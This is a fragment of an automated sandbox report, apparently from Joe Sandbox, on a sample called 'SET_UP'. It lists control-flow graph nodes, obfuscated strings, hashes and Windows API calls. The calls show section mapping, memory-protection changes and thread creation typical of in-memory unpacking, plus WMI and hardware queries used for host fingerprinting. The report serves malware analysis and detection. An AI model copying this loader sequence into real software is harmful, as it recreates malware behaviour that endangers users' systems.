LoadLibraryA 24998->24999 25000 251e2a6 24999->25000 25001 251f82a LoadLibraryA 25000->25001 25002 251e2be 25001->25002 25003 251f82a LoadLibraryA 25002->25003 25004 251e2dc 25003->25004 25005 251e2f1 VirtualAlloc 25004->25005 25006 251e305 25004->25006 25005->25006 25008 251e31f 25005->25008 25006->24997 25007 251f82a LoadLibraryA 25010 251e39d 25007->25010 25008->25006 25008->25007 25009 251f82a LoadLibraryA 25011 251e3f3 25009->25011 25010->25006 25010->25011 25023 251f631 25010->25023 25011->25006 25011->25009 25013 251e455 25011->25013 25013->25006 25018 251e4b7 25013->25018 25051 251d413 LoadLibraryA 25013->25051 25015 251e4a0 25015->25006 25052 251d50e LoadLibraryA 25015->25052 25018->25006 25027 251e9b3 25018->25027 25020 251f841 25019->25020 25021 251f868 25020->25021 25069 251d92f LoadLibraryA 25020->25069 25021->24991 25026 251f646 25023->25026 25024 251f6bc LoadLibraryA 25025 251f6c6 25024->25025 25025->25010 25026->25024 25026->25025 25028 251e9ee 25027->25028 25029 251ea35 NtCreateSection 25028->25029 25031 251ea5a 25028->25031 25050 251f062 25028->25050 25029->25031 25029->25050 25030 251eaef NtMapViewOfSection 25040 251eb0f 25030->25040 25031->25030 25031->25050 25032 251ee38 VirtualAlloc 25037 251ee7a 25032->25037 25033 251f631 LoadLibraryA 25033->25040 25034 251f631 LoadLibraryA 25041 251ed96 25034->25041 25035 251ef2b VirtualProtect 25038 251eff6 VirtualProtect 25035->25038 25042 251ef4b 25035->25042 25036 251ee34 25036->25032 25037->25035 25046 251ef18 NtMapViewOfSection 25037->25046 25037->25050 25045 251f025 25038->25045 25039 251f6cf LoadLibraryA 25039->25040 25040->25033 25040->25039 25040->25041 25040->25050 25041->25032 25041->25034 25041->25036 25053 251f6cf LoadLibraryA 25041->25053 25042->25038 25049 251efd0 VirtualProtect 25042->25049 25043 251f178 CreateThread 25043->25050 25055 2db8580 25043->25055 25048 251f170 25045->25048 25045->25050 25054 251f3e4 LoadLibraryA 25045->25054 25046->25035 25046->25050 25048->25043 25048->25050 25049->25042 25050->25006 25051->25015 25052->25018 25053->25041 25054->25048 25057 2db858f 25055->25057 25056 2db88d7 RtlExitUserThread 25057->25056 25058 2db85a4 GetCurrentProcessId GetCurrentThreadId 25057->25058 25067 2db88bb 25057->25067 25059 2db85ca 25058->25059 25060 2db85ce SHGetSpecialFolderPathW 25058->25060 25059->25060 25061 2db8690 25060->25061 25061->25061 25062 2deae90 RtlAllocateHeap 25061->25062 25063 2db8734 GetForegroundWindow 25062->25063 25065 2db87f0 25063->25065 25065->25067 25068 2dbc4f0 CoInitializeEx 25065->25068 25067->25056 25069->25020
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $!$$$$$%$&$'$)$+$+$-$-$-$/$1DN$2$3$5$6$6$7$8$=$A$C$D$D$D$D$D$D$E$F$G$I$I$I$I$I$J$K$L$L$M$M$M$M$M$N$O$P$Q$R$W$Y$[q@%$[q@%$^$_$_$`$`$a$d$e$f$h$h$i$j$m$n$o$p$r$t$v$x$z$|$|$|$}$}$}$~$~
                                                                                                            • API String ID: 0-1354559672
                                                                                                            • Opcode ID: f386a2eae13a1393a001f10aaac9c3b38bea5443739fa1b17b145411d1f8d62a
                                                                                                            • Instruction ID: 796d84cfd7e3c326de0051d2e4b736f6e59abf2139a0552e7d79ebd6cc297d87
                                                                                                            • Opcode Fuzzy Hash: f386a2eae13a1393a001f10aaac9c3b38bea5443739fa1b17b145411d1f8d62a
                                                                                                            • Instruction Fuzzy Hash: C113B07150C7C18AD3259B38889439FBBD2AFD6324F288A6DD4E9873D2D7798845CB13

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 458 2de7ca0-2de7cca 459 2de7cd0-2de7d32 458->459 459->459 460 2de7d34-2de7d45 459->460 461 2de7d50-2de7d75 460->461 461->461 462 2de7d77-2de7db8 461->462 463 2de7dc0-2de7ded 462->463 463->463 464 2de7def-2de7e0b 463->464 466 2de7e0d-2de7e22 464->466 467 2de7e7b-2de7ecc CoCreateInstance 464->467 468 2de7e30-2de7e6c 466->468 469 2de843b-2de8467 call 2dee500 GetVolumeInformationW 467->469 470 2de7ed2-2de7f0b 467->470 468->468 471 2de7e6e-2de7e73 468->471 476 2de8469-2de846d 469->476 477 2de8471-2de8473 469->477 473 2de7f10-2de7f70 470->473 471->467 473->473 475 2de7f72-2de7fa4 SysAllocString 473->475 482 2de842a-2de8437 SysFreeString 475->482 483 2de7faa-2de7fc4 CoSetProxyBlanket 475->483 476->477 478 2de848d-2de8494 477->478 480 2de84ad-2de84ca 478->480 481 2de8496-2de849d 478->481 487 2de84d0-2de84f6 480->487 481->480 484 2de849f-2de84ab 481->484 482->469 485 2de7fca-2de7fe3 483->485 486 2de8420-2de8426 483->486 484->480 488 2de7ff0-2de801b 485->488 486->482 487->487 489 2de84f8-2de851f 487->489 488->488 490 2de801d-2de809f SysAllocString 488->490 491 2de8520-2de858e 489->491 492 2de80a0-2de80d8 490->492 491->491 493 2de8590-2de85bf call 2dcdf30 491->493 492->492 494 2de80da-2de8103 SysAllocString 492->494 497 2de85c0-2de85c8 493->497 499 2de840a-2de841c 494->499 500 2de8109-2de812b 494->500 497->497 501 2de85ca-2de85cc 497->501 499->486 508 2de8400-2de8406 500->508 509 2de8131-2de8134 500->509 502 2de85d2-2de85e2 call 2db7f70 501->502 503 2de8480-2de8487 501->503 502->503 503->478 506 2de85e7-2de85ee 503->506 508->499 509->508 511 2de813a-2de813f 509->511 511->508 513 2de8145-2de818f VariantInit 511->513 514 2de8190-2de81cd 513->514 514->514 515 2de81cf-2de81e1 514->515 516 2de81e5-2de81e7 515->516 517 2de83ef-2de83fc VariantClear 516->517 518 2de81ed-2de81f3 516->518 517->508 518->517 519 2de81f9-2de8203 518->519 520 2de8205-2de820a 519->520 521 2de8243 519->521 523 2de821c-2de8220 520->523 522 2de8245-2de825d call 2db7ef0 521->522 532 2de8263-2de826d 522->532 533 2de83a1-2de83b2 522->533 524 2de8222-2de822d 523->524 525 2de8210 523->525 527 2de822f-2de8234 524->527 528 2de8236-2de823c 524->528 530 2de8211-2de821a 525->530 527->530 528->530 531 2de823e-2de8241 528->531 530->522 530->523 531->530 532->533 534 2de8273-2de827b 532->534 535 2de83b9-2de83c5 533->535 536 2de83b4 533->536 537 2de8280-2de828d 534->537 538 2de83cc-2de83ec call 2db7f20 call 2db7f00 535->538 539 2de83c7 535->539 536->535 541 2de828f-2de8297 537->541 542 2de82a0-2de82a6 537->542 538->517 539->538 544 2de8340-2de8344 541->544 545 2de82df-2de82ed 542->545 546 2de82a8-2de82ab 542->546 550 2de8346-2de834c 544->550 547 2de82ef-2de82f2 545->547 548 2de8358-2de8361 545->548 546->545 551 2de82ad-2de82dd 546->551 547->548 552 2de82f4-2de833d 547->552 555 2de8368-2de836e 548->555 556 2de8363-2de8366 548->556 550->533 554 2de834e-2de8350 550->554 551->544 552->544 554->537 557 2de8356 554->557 558 2de839d-2de839f 555->558 559 2de8370-2de839b 555->559 556->550 557->533 558->544 559->544
                                                                                                            APIs
                                                                                                            • CoCreateInstance.COMBASE(02DF268C,00000000,00000001,02DF267C,00000000), ref: 02DE7EC4
                                                                                                            • SysAllocString.OLEAUT32(5080528B), ref: 02DE7F77
                                                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02DE7FBC
                                                                                                            • SysAllocString.OLEAUT32(6A84749C), ref: 02DE8022
                                                                                                            • SysAllocString.OLEAUT32(F6B4F0A4), ref: 02DE80DF
                                                                                                            • VariantInit.OLEAUT32(uz{x), ref: 02DE814A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                            • String ID: !.$# $C$[HLE$\$uz{x
                                                                                                            • API String ID: 65563702-660603629
                                                                                                            • Opcode ID: 706118caac5f6664f0936f6835fe2ac384babeac3acecaed99c8a82c70d3fd45
                                                                                                            • Instruction ID: 720971a903062e0b29aabad607940bb827f3884db0f385e651cde4aae2b16a20
                                                                                                            • Opcode Fuzzy Hash: 706118caac5f6664f0936f6835fe2ac384babeac3acecaed99c8a82c70d3fd45
                                                                                                            • Instruction Fuzzy Hash: 5542DE72A483418BD710DF28C88475BBBE6EFC4714F198A2CE5D69B390D774D909CB92

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 560 2dbd3cb-2dbd3ff call 2de2d80 call 2db95e0 CoUninitialize 565 2dbd400-2dbd414 560->565 565->565 566 2dbd416-2dbd42f 565->566 567 2dbd430-2dbd480 566->567 567->567 568 2dbd482-2dbd4df 567->568 569 2dbd4e0-2dbd536 568->569 569->569 570 2dbd538-2dbd549 569->570 571 2dbd56b-2dbd573 570->571 572 2dbd54b-2dbd559 570->572 574 2dbd58d 571->574 575 2dbd575-2dbd57a 571->575 573 2dbd560-2dbd569 572->573 573->571 573->573 577 2dbd591-2dbd59e 574->577 576 2dbd580-2dbd589 575->576 576->576 578 2dbd58b 576->578 579 2dbd5bb-2dbd5c3 577->579 580 2dbd5a0-2dbd5a7 577->580 578->577 582 2dbd5db-2dbd5e5 579->582 583 2dbd5c5-2dbd5c6 579->583 581 2dbd5b0-2dbd5b9 580->581 581->579 581->581 585 2dbd5fb-2dbd607 582->585 586 2dbd5e7-2dbd5eb 582->586 584 2dbd5d0-2dbd5d9 583->584 584->582 584->584 588 2dbd609-2dbd60b 585->588 589 2dbd621-2dbd745 585->589 587 2dbd5f0-2dbd5f9 586->587 587->585 587->587 590 2dbd610-2dbd61d 588->590 591 2dbd750-2dbd7b4 589->591 590->590 592 2dbd61f 590->592 591->591 593 2dbd7b6-2dbd7cf 591->593 592->589 594 2dbd7d0-2dbd7e4 593->594 594->594 595 2dbd7e6-2dbd814 call 2dbb3d0 594->595 597 2dbd819-2dbd833 595->597
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Uninitialize
                                                                                                            • String ID: -X%^$3T0j$4P"V$5@<F$5L>B$:\/R$B8J>$F$Q:$J(Y.$Z F&$_,Q"$gd$q$qlmb$zD0Z
                                                                                                            • API String ID: 3861434553-4232039718
                                                                                                            • Opcode ID: a7b4af0a86e0a0dd84919d47aa1452c14fddd1e0ca04db4977b592d5188bcf23
                                                                                                            • Instruction ID: 63857b75345302a7b6a42349ac4afb916537d66fe1148e9bde672269888a447d
                                                                                                            • Opcode Fuzzy Hash: a7b4af0a86e0a0dd84919d47aa1452c14fddd1e0ca04db4977b592d5188bcf23
                                                                                                            • Instruction Fuzzy Hash: 31B1C3715083C28FC325CF2984A17EBBBE1AF92314F18496DD4DA9B352D774890ACB92

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 602 2dbfd12-2dbfd2a 603 2dbfd2c-2dbfd2f 602->603 604 2dbfd5d-2dbfd8b call 2db1870 603->604 605 2dbfd31-2dbfd5b 603->605 608 2dbfd8d-2dbfd90 604->608 605->603 609 2dbfd92-2dbfdd3 608->609 610 2dbfdd5-2dbfdf8 call 2db1870 608->610 609->608 613 2dbfdfa-2dbfe33 call 2dc33c0 610->613 614 2dbfdfc-2dbfe00 610->614 621 2dbfe37-2dbfe78 call 2db7ef0 call 2dba5a0 613->621 622 2dbfe35 613->622 616 2dc07ca 614->616 618 2dc1296 616->618 620 2dc1298-2dc12a2 call 2db1f30 618->620 628 2dbe26a-2dbe298 call 2db1f40 620->628 629 2dbe261-2dc12b3 620->629 636 2dbfe7a-2dbfe7d 621->636 622->621 637 2dbe29c-2dbe29f 628->637 638 2dbfe7f-2dbfedc 636->638 639 2dbfede-2dbff09 call 2db1870 636->639 640 2dbe30d-2dbe333 call 2db1e30 637->640 641 2dbe2a1-2dbe30b 637->641 638->636 645 2dbff0b-2dbff32 call 2dc33c0 639->645 646 2dbff5f-2dbff87 call 2dc33c0 639->646 650 2dbe337 640->650 651 2dbe335-2dbe354 640->651 641->637 655 2dbff36-2dbff5a call 2db7ef0 call 2dba5a0 645->655 656 2dbff34 645->656 657 2dbff8b-2dc0019 call 2db7ef0 call 2dba5a0 646->657 658 2dbff89 646->658 650->620 659 2dbe356-2dbe359 651->659 655->646 656->655 673 2dc001b-2dc001e 657->673 658->657 662 2dbe35b-2dbe388 659->662 663 2dbe38a-2dbe3db call 2db1970 659->663 662->659 663->618 671 2dbe3e1 663->671 671->618 674 2dc005c-2dc0069 673->674 675 2dc0020-2dc005a 673->675 676 2dc007e-2dc0097 674->676 677 2dc006b-2dc0079 call 2db7f00 674->677 675->673 679 2dc0099 676->679 680 2dc009b-2dc00ea call 2db7ef0 676->680 685 2dc07c8 677->685 679->680 687 2dc00ec-2dc010d call 2db7f00 * 2 680->687 688 2dc0112-2dc013a call 2db7f00 680->688 685->616 705 2dc07c6 687->705 698 2dc013c-2dc013f 688->698 700 2dc0170-2dc018b call 2db1870 698->700 701 2dc0141-2dc016e 698->701 706 2dc018d-2dc01d2 call 2dc33c0 700->706 707 2dc01fe-2dc021f 700->707 701->698 705->685 714 2dc01d4 706->714 715 2dc01d6-2dc01fa call 2db7ef0 call 2dba5a0 706->715 709 2dc0223-2dc0226 707->709 711 2dc0228-2dc025e 709->711 712 2dc0260-2dc02a6 call 2db1b80 709->712 711->709 718 2dc02a8-2dc02ab 712->718 714->715 715->707 720 2dc033a-2dc035a call 2db1a80 718->720 721 2dc02b1-2dc0335 718->721 726 2dc068a-2dc070e call 2db8a70 call 2dc43d0 720->726 727 2dc0360-2dc03b2 call 2db1f30 720->727 721->718 735 2dc0713-2dc0722 call 2db95e0 726->735 733 2dc03b4 727->733 734 2dc03b6-2dc03d4 call 2db7ef0 727->734 733->734 740 2dc0408-2dc0417 734->740 741 2dc03d6-2dc03e4 734->741 743 2dc0759-2dc0785 call 2db7f00 * 2 735->743 744 2dc0724-2dc0733 735->744 742 2dc0419-2dc041b 740->742 745 2dc03e6-2dc03f7 call 2dc3500 741->745 748 2dc041d-2dc0424 742->748 749 2dc0429-2dc0464 call 2db1f40 742->749 774 2dc0798-2dc07a5 743->774 775 2dc0787-2dc0796 call 2db7f00 743->775 750 2dc0735 744->750 751 2dc0747-2dc0757 call 2db7f00 744->751 757 2dc03f9 745->757 758 2dc03fb-2dc0406 745->758 748->726 764 2dc0466-2dc0469 749->764 755 2dc0737-2dc0743 call 2dc36a0 750->755 751->743 769 2dc0745 755->769 757->745 758->740 767 2dc04ab-2dc04eb call 2db1870 764->767 768 2dc046b-2dc04a9 764->768 776 2dc04ed-2dc04f0 767->776 768->764 769->751 780 2dc07ba-2dc07c1 call 2db8b50 774->780 781 2dc07a7-2dc07b8 call 2db7f00 774->781 775->774 777 2dc0520-2dc0568 call 2db1870 776->777 778 2dc04f2-2dc051e 776->778 788 2dc056a-2dc056d 777->788 778->776 780->705 781->780 790 2dc056f-2dc059e 788->790 791 2dc05a0-2dc05ed call 2db1b80 788->791 790->788 794 2dc05ef-2dc05f2 791->794 795 2dc05f4-2dc060f 794->795 796 2dc0611-2dc0685 call 2db1b80 call 2dc3520 794->796 795->794 796->742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: '$)$+$2$J$O$Z$\$\$t
                                                                                                            • API String ID: 0-2531731213
                                                                                                            • Opcode ID: ded036bd3921ac8d243378308d7da242ca7773dc695e141683142f06714861aa
                                                                                                            • Instruction ID: 52beb5d70d7d775b95a084c7206ece17740b90fc4a17a838793101b4e8d4d5b3
                                                                                                            • Opcode Fuzzy Hash: ded036bd3921ac8d243378308d7da242ca7773dc695e141683142f06714861aa
                                                                                                            • Instruction Fuzzy Hash: 71526F7260D791CFD7259B3884943AEBBE2AFC5320F198A2ED5DA873C1D6758801CB53
                                                                                                            APIs
                                                                                                            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 0251EA4C
                                                                                                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 0251EAF4
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0251EE68
                                                                                                            • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 0251EF1D
                                                                                                            • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 0251EF3A
                                                                                                            • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 0251EFDD
                                                                                                            • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 0251F010
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0251F181
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4127854417.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024D0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_24d0000_SET_UP.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1248616170-0
                                                                                                            • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                            • Instruction ID: e12f6f5b0a27429d83172fe8e80cba5aa0de4bd202643d0e0140855c9c9242b6
                                                                                                            • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                            • Instruction Fuzzy Hash: 71426871608301AFEB24CF24CC45B6ABBE9BF88718F04492DFD959B291E770E941CB95

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 988 2dbc555-2dbc562 989 2dbc570-2dbc58a 988->989 989->989 990 2dbc58c-2dbc5b1 call 2db84c0 989->990 993 2dbc5c0-2dbc5da 990->993 993->993 994 2dbc5dc-2dbc63f 993->994 995 2dbc640-2dbc659 994->995 995->995 996 2dbc65b-2dbc66c 995->996 997 2dbc68b-2dbc693 996->997 998 2dbc66e-2dbc675 996->998 999 2dbc6ab-2dbc6b8 997->999 1000 2dbc695-2dbc696 997->1000 1001 2dbc680-2dbc689 998->1001 1003 2dbc6db-2dbc6e3 999->1003 1004 2dbc6ba-2dbc6c1 999->1004 1002 2dbc6a0-2dbc6a9 1000->1002 1001->997 1001->1001 1002->999 1002->1002 1006 2dbc6fb-2dbc813 1003->1006 1007 2dbc6e5-2dbc6e6 1003->1007 1005 2dbc6d0-2dbc6d9 1004->1005 1005->1003 1005->1005 1009 2dbc820-2dbc83a 1006->1009 1008 2dbc6f0-2dbc6f9 1007->1008 1008->1006 1008->1008 1009->1009 1010 2dbc83c-2dbc861 1009->1010 1011 2dbc870-2dbc897 1010->1011 1011->1011 1012 2dbc899-2dbc8c6 call 2dbb3d0 1011->1012 1014 2dbc8cb-2dbc8e5 1012->1014
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ;6=p$h}|Q$js5f$pd.$$sgda$skTa$|~&
                                                                                                            • API String ID: 0-3589289367
                                                                                                            • Opcode ID: 033ba77b35fd794ff0c9faa42454dadd2bf92a1d01138d93ed90f0d91960a885
                                                                                                            • Instruction ID: 70a870152a763cb0a0302b22274c60785791fd5304dd557259ea6183864f291f
                                                                                                            • Opcode Fuzzy Hash: 033ba77b35fd794ff0c9faa42454dadd2bf92a1d01138d93ed90f0d91960a885
                                                                                                            • Instruction Fuzzy Hash: 4571ADB454C3C18ED3728F259494BEFBBE0AF92304F1459AEC4DA6B356C7350846CB66

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1015 2db8580-2db8591 call 2dec280 1018 2db88d7-2db88df RtlExitUserThread 1015->1018 1019 2db8597-2db859e call 2de5380 1015->1019 1022 2db88d2 call 2deca50 1019->1022 1023 2db85a4-2db85c8 GetCurrentProcessId GetCurrentThreadId 1019->1023 1022->1018 1025 2db85ca-2db85cc 1023->1025 1026 2db85ce-2db868f SHGetSpecialFolderPathW 1023->1026 1025->1026 1027 2db8690-2db8716 1026->1027 1027->1027 1028 2db871c-2db8757 call 2deae90 1027->1028 1031 2db8760-2db879b 1028->1031 1032 2db879d-2db87d2 1031->1032 1033 2db87d4-2db87ea GetForegroundWindow 1031->1033 1032->1031 1034 2db8881-2db88b4 call 2db9ac0 1033->1034 1035 2db87f0-2db887f 1033->1035 1038 2db88c0-2db88c7 1034->1038 1039 2db88b6 call 2dbc4f0 1034->1039 1035->1034 1038->1022 1041 2db88c9-2db88cf call 2db7f00 1038->1041 1042 2db88bb call 2dbb3a0 1039->1042 1041->1022 1042->1038
                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 02DB85A4
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02DB85AE
                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02DB864B
                                                                                                            • GetForegroundWindow.USER32 ref: 02DB87E2
                                                                                                              • Part of subcall function 02DBC4F0: CoInitializeEx.COMBASE(00000000,00000002), ref: 02DBC503
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 02DB88D9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread$ExitFolderForegroundInitializePathProcessSpecialUserWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3173001972-0
                                                                                                            • Opcode ID: 80a44231b27bc3ae8b9bdc2acdeb0d2e6c64056b1a6458af0525bf77fdbda4ff
                                                                                                            • Instruction ID: 0fb44dcd227ed28f4a9b7af475f52c1b5781f0ab1aff22102ea4b6c214e4faad
                                                                                                            • Opcode Fuzzy Hash: 80a44231b27bc3ae8b9bdc2acdeb0d2e6c64056b1a6458af0525bf77fdbda4ff
                                                                                                            • Instruction Fuzzy Hash: 7F816BB3B043044FD71CAE789C963AAB6C79FC4314F0E853D9996DB390EAB49C098795

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1046 2ddc3f3-2ddc40f 1047 2ddc410-2ddc443 1046->1047 1047->1047 1048 2ddc445-2ddc450 1047->1048 1049 2ddc46b-2ddc477 1048->1049 1050 2ddc452-2ddc45a 1048->1050 1052 2ddc479-2ddc47b 1049->1052 1053 2ddc491-2ddc4fb call 2dee500 1049->1053 1051 2ddc460-2ddc469 1050->1051 1051->1049 1051->1051 1055 2ddc480-2ddc48d 1052->1055 1059 2ddc500-2ddc527 1053->1059 1055->1055 1057 2ddc48f 1055->1057 1057->1053 1059->1059 1060 2ddc529-2ddc55f call 2dcdf30 1059->1060 1063 2ddc560-2ddc574 1060->1063 1063->1063 1064 2ddc576-2ddc57d 1063->1064 1065 2ddc57f-2ddc583 1064->1065 1066 2ddc59b-2ddc5a3 1064->1066 1067 2ddc590-2ddc599 1065->1067 1068 2ddc5bb-2ddc5c5 1066->1068 1069 2ddc5a5-2ddc5a6 1066->1069 1067->1066 1067->1067 1070 2ddc5db-2ddc61b 1068->1070 1071 2ddc5c7-2ddc5cb 1068->1071 1072 2ddc5b0-2ddc5b9 1069->1072 1074 2ddc620-2ddc634 1070->1074 1073 2ddc5d0-2ddc5d9 1071->1073 1072->1068 1072->1072 1073->1070 1073->1073 1074->1074 1075 2ddc636-2ddc63d 1074->1075 1076 2ddc63f-2ddc643 1075->1076 1077 2ddc65b-2ddc665 1075->1077 1078 2ddc650-2ddc659 1076->1078 1079 2ddc67b-2ddc6f3 1077->1079 1080 2ddc667-2ddc66b 1077->1080 1078->1077 1078->1078 1082 2ddc78d-2ddc7b1 1079->1082 1081 2ddc670-2ddc679 1080->1081 1081->1079 1081->1081 1083 2ddc7c0-2ddc7f4 1082->1083 1083->1083 1084 2ddc7f6-2ddc803 1083->1084 1085 2ddc81b-2ddc827 1084->1085 1086 2ddc805-2ddc807 1084->1086 1088 2ddc829-2ddc82b 1085->1088 1089 2ddc841-2ddc88b call 2dee500 GetPhysicallyInstalledSystemMemory 1085->1089 1087 2ddc810-2ddc819 1086->1087 1087->1085 1087->1087 1090 2ddc830-2ddc83d 1088->1090 1094 2ddc890-2ddc8b7 1089->1094 1090->1090 1092 2ddc83f 1090->1092 1092->1089 1094->1094 1095 2ddc8b9-2ddc8ef call 2dcdf30 1094->1095 1098 2ddc8f0-2ddc904 1095->1098 1098->1098 1099 2ddc906-2ddc90d 1098->1099 1100 2ddc90f 1099->1100 1101 2ddc91b-2ddc923 1099->1101 1102 2ddc910-2ddc919 1100->1102 1103 2ddc93b-2ddc945 1101->1103 1104 2ddc925-2ddc926 1101->1104 1102->1101 1102->1102 1106 2ddc95b-2ddc99f 1103->1106 1107 2ddc947-2ddc94b 1103->1107 1105 2ddc930-2ddc939 1104->1105 1105->1103 1105->1105 1109 2ddc9a0-2ddc9b4 1106->1109 1108 2ddc950-2ddc959 1107->1108 1108->1106 1108->1108 1109->1109 1110 2ddc9b6-2ddc9c5 1109->1110 1111 2ddc9db-2ddc9e5 1110->1111 1112 2ddc9c7 1110->1112 1114 2ddc9eb 1111->1114 1115 2ddc700-2ddc78a 1111->1115 1113 2ddc9d0-2ddc9d9 1112->1113 1113->1111 1113->1113 1116 2ddc9f0-2ddc9f9 1114->1116 1115->1082 1116->1116 1117 2ddc9fb 1116->1117 1117->1115
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4128416139.0000000002DB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_2db1000_SET_UP.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "DJc$DDKG$UXvD
                                                                                                            • API String ID: 0-222356835
                                                                                                            • Opcode ID: ce4546fb85272fcd98aec7764df42c182c76eedd9200dd3c36980fbfa3612b35
                                                                                                            • Instruction ID: e88e8f9bd7a86bb97dbceff0158a8e93a25fa8feae06bd6fef39f3ab9c7c35a6
                                                                                                            • Opcode Fuzzy Hash: ce4546fb85272fcd98aec7764df42c182c76eedd9200dd3c36980fbfa3612b35
                                                                                                            • Instruction Fuzzy Hash: 4EF1D2B051C7D18FD729CF2980607ABBFE1AF96304F1849AEE0C59B382D7758906CB56

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
